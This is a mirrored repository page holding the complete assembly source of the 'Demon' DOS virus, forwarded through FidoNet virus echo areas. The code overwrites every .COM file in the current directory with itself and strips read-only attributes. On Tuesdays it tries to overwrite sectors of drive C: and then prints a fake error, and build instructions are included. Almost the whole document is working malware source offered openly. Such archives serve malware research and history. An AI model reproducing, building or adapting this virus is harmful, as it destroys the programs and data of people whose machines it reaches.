mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 01:46:09 +00:00
163 lines
7.0 KiB
NASM
163 lines
7.0 KiB
NASM
|
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
|
|||
|
; Msg : 32 of 54
|
|||
|
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
|
|||
|
; To : - *.* - Fri 11 Nov 94 08:10
|
|||
|
; Subj : DEMON.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;.RealName: Max Ivanov
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;* Kicked-up by MeteO (2:5030/136)
|
|||
|
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
|
|||
|
;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 16:57)
|
|||
|
;* To : Dr T.
|
|||
|
;* Subj : DEMON.ASM
|
|||
|
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
;@RFC-Path:
|
|||
|
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
|||
|
;18.n283!not-for-mail
|
|||
|
;@RFC-Dt: 19-Oct-91 04:19
|
|||
|
;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org
|
|||
|
;By: Skin Head
|
|||
|
;To: All
|
|||
|
;Re: New Source Code
|
|||
|
|
|||
|
;========== Demon virus ==================================== 22.09.91 ========
|
|||
|
;
|
|||
|
; Assemble and link with: TASM DEMON.VIR
|
|||
|
; TLINK DEMON /X/T
|
|||
|
; Infect all .COM programs in current directory with: DEMON
|
|||
|
;
|
|||
|
; !!! NOT ON A TUESDAY !!!
|
|||
|
;
|
|||
|
;-------------- Constants and structures
|
|||
|
|
|||
|
Tuesday = 2 ; INT 21h, AH=2Ah
|
|||
|
|
|||
|
Search_Rec struc ; directory search record
|
|||
|
db 21 dup (?) ; reserved for DOS
|
|||
|
FileAttr db ? ; file attribute
|
|||
|
FileTime dw ? ; packed file time
|
|||
|
FileDate dw ? ; packed file date
|
|||
|
FileSize dd ? ; long file size
|
|||
|
FileName db 13 dup (?) ; ASCIIZ FILENAME.EXT
|
|||
|
Search_Rec ends
|
|||
|
|
|||
|
;-------------- Demon virus segment
|
|||
|
|
|||
|
Virus segment
|
|||
|
assume cs:Virus,ds:Virus,es:Virus,ss:Virus
|
|||
|
|
|||
|
org 0080h
|
|||
|
DTA Search_Rec <> ; disk transfer area
|
|||
|
|
|||
|
org 0100h
|
|||
|
Demon: ; virus entry point
|
|||
|
Virus_Size = Virus_End - Demon ; virus size = 272 bytes
|
|||
|
|
|||
|
mov dx,offset All_COM ; find first .COM file,
|
|||
|
mov ah,4eh ; including hidden/system
|
|||
|
mov cx,110bh
|
|||
|
int 21h
|
|||
|
nop
|
|||
|
jnc Infect ; abort if no files found
|
|||
|
jmp short Check_Day
|
|||
|
Infect: call Replicate ; overwrite first 272 bytes
|
|||
|
mov dx,offset DTA
|
|||
|
mov ah,4fh ; find next .COM file,
|
|||
|
int 21h ; go check day if none found
|
|||
|
nop ; else repeat
|
|||
|
jnc Next_File
|
|||
|
jmp short Check_Day
|
|||
|
Next_File: jmp Infect
|
|||
|
Check_Day: mov ah,2ah ; get DOS date, check day
|
|||
|
int 21h
|
|||
|
cmp al,Tuesday ; Tuesday ?
|
|||
|
je Thrash_Drive ; if yes, thrash drive C:
|
|||
|
mov ah,4ch ; else exit to DOS
|
|||
|
int 21h
|
|||
|
|
|||
|
Thrash_Drive: mov Counter,0 ; overwrite first 160 sectors
|
|||
|
jmp Write_Sectors ; of drive C: with garbage
|
|||
|
Write_Sectors: mov al,Drive_C ; Error: doesn't work !
|
|||
|
mov cx,160 ; AL=C:, CX=160 sectors
|
|||
|
mov dx,0 ; DX=highest sector in drive !
|
|||
|
mov bx,0 ; DS:BX=start of PSP area
|
|||
|
int 26h ; overwrite sectors
|
|||
|
inc Counter
|
|||
|
cmp Counter,10 ; repeat 10 times
|
|||
|
je Show_Msg
|
|||
|
jne Write_Sectors
|
|||
|
Show_Msg: mov ah,09h ; show a fake error message
|
|||
|
mov dx,offset Virus_Msg ; and exit to DOS
|
|||
|
int 21h
|
|||
|
mov ah,4ch
|
|||
|
int 21h
|
|||
|
|
|||
|
Replicate: mov dx,offset DTA.FileName ; save file attribute
|
|||
|
mov ax,4300h
|
|||
|
int 21h
|
|||
|
mov COM_Attr,cx
|
|||
|
nop
|
|||
|
xor cx,cx ; unprotect the .COM file
|
|||
|
mov ax,4301h ; in case it's read-only
|
|||
|
int 21h
|
|||
|
nop
|
|||
|
mov ax,3d02h ; open .COM file for R/W,
|
|||
|
int 21h ; abort on error
|
|||
|
nop
|
|||
|
jc Check_Day
|
|||
|
mov bx,ax ; BX = file handle
|
|||
|
mov ax,5700h
|
|||
|
int 21h ; save file date and time
|
|||
|
nop
|
|||
|
mov COM_Time,cx
|
|||
|
mov COM_Date,dx
|
|||
|
mov dx,offset Demon ; overwrite first 272 bytes
|
|||
|
mov ah,40h ; of .COM program file
|
|||
|
mov cx,Virus_Size ; with the virus code
|
|||
|
int 21h
|
|||
|
nop
|
|||
|
mov ax,5701h ; restore file date and time
|
|||
|
mov dx,COM_Date
|
|||
|
mov cx,COM_Time
|
|||
|
int 21h
|
|||
|
mov ah,3eh ; close the file
|
|||
|
int 21h
|
|||
|
nop
|
|||
|
mov dx,offset DTA.FileName ; restore file attribute
|
|||
|
mov cx,COM_Attr
|
|||
|
mov ax,4301h
|
|||
|
int 21h
|
|||
|
retn
|
|||
|
|
|||
|
All_COM db '*.COM',0 ; dir search specification
|
|||
|
COM_Date dw 0 ; packed .COM program date
|
|||
|
COM_Time dw 0 ; packed .COM program time
|
|||
|
COM_Attr dw 0 ; .COM program file attribute
|
|||
|
Counter db 0 ; used when thrashing drive C:
|
|||
|
Drive_C db 2 ; INT 26h C: drive number
|
|||
|
dw 0
|
|||
|
Copyright db 'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)'
|
|||
|
dw 0
|
|||
|
Virus_Msg db 10,13,'Error eating drive C:',10,13,'$'
|
|||
|
|
|||
|
Virus_End label byte ; virus code+data end
|
|||
|
|
|||
|
Virus ends
|
|||
|
end Demon
|
|||
|
|
|||
|
;-+- FastEcho/386 1.41.b7/Real
|
|||
|
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
|
|||
|
;=============================================================================
|
|||
|
;
|
|||
|
;Yoo-hooo-oo, -!
|
|||
|
;
|
|||
|
;
|
|||
|
; <20> The Me<4D>eO
|
|||
|
;
|
|||
|
;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none
|
|||
|
;
|
|||
|
;--- Aidstest Null: /Kill
|
|||
|
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)
|
|||
|
|